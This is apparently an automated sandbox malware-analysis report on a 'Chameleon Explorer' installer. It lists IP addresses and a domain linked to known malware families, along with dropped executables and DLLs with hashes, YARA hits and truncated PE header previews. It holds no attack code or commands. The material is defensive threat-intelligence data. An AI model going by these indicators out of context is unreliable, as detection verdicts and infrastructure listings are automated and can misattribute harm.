                                                                          20:27:29API Interceptor1282x Sleep call for process: ChameleonExplorer.exe modified
                                                                          20:28:08API Interceptor13947x Sleep call for process: ChameleonFolder.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          104.21.79.229cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                            roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                              C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                                                lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                  setup.exeGet hashmaliciousUnknownBrowse
                                                                                    setup.exeGet hashmaliciousUnknownBrowse
                                                                                      Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                          setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                                                                                            setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              2no.cocheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                                              • 104.21.79.229
                                                                                              roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                              • 104.21.79.229
                                                                                              cheat_roblox.exeGet hashmaliciousXWormBrowse
                                                                                              • 172.67.149.76
                                                                                              roblox cheat.exeGet hashmaliciousXWormBrowse
                                                                                              • 172.67.149.76
                                                                                              C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                                                              • 104.21.79.229
                                                                                              lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                              • 104.21.79.229
                                                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.79.229
                                                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.79.229
                                                                                              file.exeGet hashmaliciousXenoRATBrowse
                                                                                              • 172.67.149.76
                                                                                              Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                                              • 104.21.79.229
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSAimStar.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 162.159.128.233
                                                                                              7FEGBYFBHFBJH32.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                                                              • 188.114.96.3
                                                                                              16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                              • 104.21.32.1
                                                                                              UhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.32.1
                                                                                              544WP3NHaP.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 172.67.220.198
                                                                                              KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.157.254
                                                                                              01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.17.25.14
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.198.102
                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.112.1
                                                                                              test.doc.bin.docGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.21.16
                                                                                              ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousAmadey, NymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousNymaimBrowse
                                                                                              • 185.156.72.65
                                                                                              file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                              • 185.156.72.65
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1UhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              qnUFsmyxMm.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              yTcaknrrb8.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.79.229
                                                                                              Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.79.229
                                                                                              37f463bf4616ecd445d4a1937da06e1916oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                              • 172.217.16.212
                                                                                              6a7e35.msiGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              0000000000000000.exeGet hashmaliciousNitolBrowse
                                                                                              • 172.217.16.212
                                                                                              0000000000000000.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              1.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.217.16.212
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeGet hashmaliciousAzorultBrowse
                                                                                                0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                  C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeGet hashmaliciousAzorultBrowse
                                                                                                    0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeGet hashmaliciousAzorultBrowse
                                                                                                        0331C7BCA665F36513377FC301CBB32822FF35F925115.exeGet hashmaliciousAZORultBrowse
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15091304
                                                                                                          Entropy (8bit):6.181292047546881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:98304:aVVZ2l4oeoFVuuaBABjcWvkEPGFta7xEmkLGg79M:aVHoeoFVzvBjbEdGg7u
                                                                                                          MD5:92A3D0847FC622B31F2D0C273A676C0E
                                                                                                          SHA1:E642D694367CC98A8863D87FEC82E4CF940EB48A
                                                                                                          SHA-256:9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                                                                                                          SHA-512:01D13FD9A0DD52BC2E3F17AF7A999682201C99ECF7218BCA254A4944A483FD1DEC2A3E6D59DEF501A024AD760B849787902ECB55BD33D23FA9651C0A7689CD1C
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, Detection: malicious, Browse
                                                                                                          • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d...f=^X..........#.........,E..............@.....................................p.....@..........@............... .......................`...p...@...B...0..|.......h4................................... ..(....................}..........|....................text............................. ..`.data....d.......f.................@....bss.........p...........................idata...p...`...r...L..............@....didata.|...........................@....edata.............................@..@.tls....x................................rdata..m.... .....................@..@.pdata..|....0.....................@..@.rsrc....B...@...B.................@..@JCLDEBUG.............&..............@..@........................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4644456
                                                                                                          Entropy (8bit):6.624930231136082
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:wo4YSsZdldgNivQrYsMSn6A59SQs3g/9ob2SSHmc9WhbDTOTI98uk5myyxsXFXzT:LJSsZdldgNimB59SQshb2SH9kwEzT
                                                                                                          MD5:5B0AE3FAC33C08145DCA4A9C272EBC34
                                                                                                          SHA1:940F504D835FC254602953495320BB92456177B9
                                                                                                          SHA-256:137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                                                                                                          SHA-512:015FFC133AD3A6937222BBC057F68B60ABFE22B900B5E7C4E6CA3EC7DC6B09ABAF54B595F00FA9212F370DA8531AF1AC5FC52B39953E1F685E81C66D1EC61F8A
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, Detection: malicious, Browse
                                                                                                          • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....=^X................../.........(./......./...@...........................c.......G...@......@...................`M.......M..H....M...............F.h4....................................M.....................D.M......PM......................text...(X/......Z/................. ..`.itext..D0...p/..2...^/............. ..`.data...\...../......./.............@....bss....<z....0..........................idata...H....M..J...`0.............@....didata......PM.......0.............@....edata.......`M.......0.............@..@.tls....H....pM..........................rdata..].....M.......0.............@..@.rsrc.........M.......0.............@..@JCLDEBUG.D...@W..F...d:.............@..@........................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):146536
                                                                                                          Entropy (8bit):5.3703743168809845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:uXYKg56JP/jTk576nGaayaa+9oWjxDgUFUFwdTzuZ/AhR:uHPkUckUFUi1um
                                                                                                          MD5:246AAA95ABDDFD76F9166A2DAA9F2D73
                                                                                                          SHA1:0467FA8567B71F6E3A54D152D9EA77121C627798
                                                                                                          SHA-256:3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                                                                                                          SHA-512:FE2042E9CE22BE3E6E6FE1B324290AEDBC155C55C0EDE63CCF44A0EEA10CE9F626C7553C40B24D917E5A4A8FB70513B33D698F7DEF5091A50831FA0529E8E669
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, Detection: malicious, Browse
                                                                                                          • Filename: 0331C7BCA665F36513377FC301CBB32822FF35F925115.exe, Detection: malicious, Browse
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d....=^X.........."..........h................@......................................................@............... ...............@..\.... ..@.......................h4...p...............................`..(....................".......0.......................text...P........................... ..`.data...............................@....bss.....N...............................idata..@.... ......................@....didata......0......................@....edata..\....@......................@..@.tls.........P...........................rdata..m....`......................@..@.reloc.......p......................@..B.pdata..............................@..@.rsrc...............................@..@....................................@..@
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):805400
                                                                                                          Entropy (8bit):6.529115621464912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                          MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                          SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                          SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                          SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):805400
                                                                                                          Entropy (8bit):6.529115621464912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                          MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                          SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                          SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                          SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):805400
                                                                                                          Entropy (8bit):6.529115621464912
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:vDS2QfWotczhwei2LiReVjKRuPJLOigmmy5fdkBAcvqwUvTuVNCz9WjAiL9izdPV:vU0zhW2LvV1JLO4LT75DyGlW4PapdEv
                                                                                                          MD5:DD5CE4D765EDD75EBA6F311E6E0EA10A
                                                                                                          SHA1:9EA7F6516E5AD0755B74463D427055F63ED1A664
                                                                                                          SHA-256:64B7F8F70A7B037D10DA72EAA769078B7E4D1AC8964C5EAE5515D373E816ED6D
                                                                                                          SHA-512:D2782310DF7CC533CC9FFAF5C1903D5BC6A500C3BBE48148C1339FB5DE19C835E4A8C765DA1B80B3744EA231353F76F22BA4E04C78A3D950D7EE291D6EAB2216
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......T.................~........................@.................................b.....@..........................`.......0...........2...............4...p...!...................................................3.......P..0....................text....s.......t.................. ..`.itext...............x.............. ..`.data....).......*..................@....bss.....T...............................idata.......0......................@....didata.0....P......................@....edata.......`......................@..@.reloc...!...p..."..................@..B.rsrc....2.......2..................@..@....................................@..@................................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1275416
                                                                                                          Entropy (8bit):5.811103517353428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                          MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                          SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                          SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                          SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1275416
                                                                                                          Entropy (8bit):5.811103517353428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                          MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                          SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                          SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                          SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1275416
                                                                                                          Entropy (8bit):5.811103517353428
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:MhmMfYVQoycp8xjtxcGnzo9/cKEAdn9bIcxesezMlUJHDD2xx9q8:MY6ZtT+bI+4Mlk2xHq8
                                                                                                          MD5:DE5F74EF4E17B2DC8AD69A3E9B8D22C7
                                                                                                          SHA1:42DF8FEDC56761041BCE47B84BD4E68EE75448D2
                                                                                                          SHA-256:B89A6A57B48BE10103825440D2157F2C4A56E4C6B79AD13F729429CD5393BF32
                                                                                                          SHA-512:515E9B498D8CD9BB03F8D9758E891D073627DFD6FB0B931650A47D6E53722AA6E1CC3CAFF8C0E64F4721AD2ABEF7A81EF4E7B49952D3C8FC325DEB5BBA6B3314
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d......T.........." .........`......`.........@..............................@............@.......................... ...................................2...0..`....B...4... ......................................................P...H............................text............................... ..`.data...`K.......L..................@....bss........@...........................idata..............................@....didata..............F..............@....edata...............H..............@..@.reloc....... .......J..............@..B.pdata..`....0.......L..............@..@.rsrc....2.......2..................@..@.............@.......B..............@..@................................................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):768032
                                                                                                          Entropy (8bit):6.537086415352977
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                          MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                          SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                          SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                          SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):768032
                                                                                                          Entropy (8bit):6.537086415352977
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                          MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                          SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                          SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                          SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):768032
                                                                                                          Entropy (8bit):6.537086415352977
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:wo6ws4L29BHDesvpczEoPAc+qyH7JRHf4Z2R5oTf+y4vWUA692IAiL9+P/c3uyDq:wo6c2zHtxJQP22mNjweEV+mwar
                                                                                                          MD5:FB76F4F533203E40CE30612A47171F94
                                                                                                          SHA1:304BA296C77A93DDB033D52578FCC147397DB981
                                                                                                          SHA-256:3DE05F18FFE9FDA589A45EA539A464E58A30F70D59D71444B018064CF831C4A6
                                                                                                          SHA-512:A416A6D6EFBBD69209E1867F12B9D1D11B21160F6DFE07C510B43112C22C317F805C67DD9402744A6C7E1541F6B3A061C49942FE28FA70F74AEA670BA9C71995
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....V..........................................P..........................@......v...........................................L........(.............. 4...........................................................................................text............................... ..`.itext.............................. ..`.data....(.......*..................@....bss....$T...@...........................idata..L............"..............@....didata..............6..............@....edata...............:..............@..@.rdata..E............<..............@..@.reloc...............>..............@..B.rsrc....(.......(...\..............@..@.............@......................@..@........................................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1226272
                                                                                                          Entropy (8bit):5.8428341731794005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                          MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                          SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                          SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                          SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7........................................................................................................................................PE..d.....V.........." .....,...R.......:........P.....................................\................................ ...............`.......0..$....P...(.............. 4...........................................................7.......P.......................text....+.......,.................. ..`.data...HF...@...H...0..............@....bss....................................idata..$....0.......x..............@....didata......P......................@....edata.......`......................@..@.rdata..E....p......................@..@.reloc..............................@..B.pdata..............................@..@.rsrc....(...P...(...Z..............@..@....................................@..@........................................
                                                                                                          Process:C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1226272
                                                                                                          Entropy (8bit):5.8428341731794005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:OXHZ/e0zlt8tEWmk37f72c4zHmIa0zydJXgvtd5/oTWisqhwjtmcre:OXHF1zlWmk3rq+grGAjre
                                                                                                          MD5:96F92C8368C1E922692F399DB96DA1EB
                                                                                                          SHA1:1A91D68F04256EF3BC1022BEB616BA65271BD914
                                                                                                          SHA-256:161408B86EED7C4D9A5882AA00DF3F8765ED28FA4FD9AAB2C9B3DCEADBD527F9
                                                                                                          SHA-512:B3D3FB2D78FE2DF864F0E07A8BC1610EE9D65251957E0495A34C1631895293590E0FCA965EC9DEB160F48A4E09A2FEABD3BFF6FB9A0C22888A941E308DE39D14
                                                                                                          Malicious:true
                                                                                                          Antivirus:
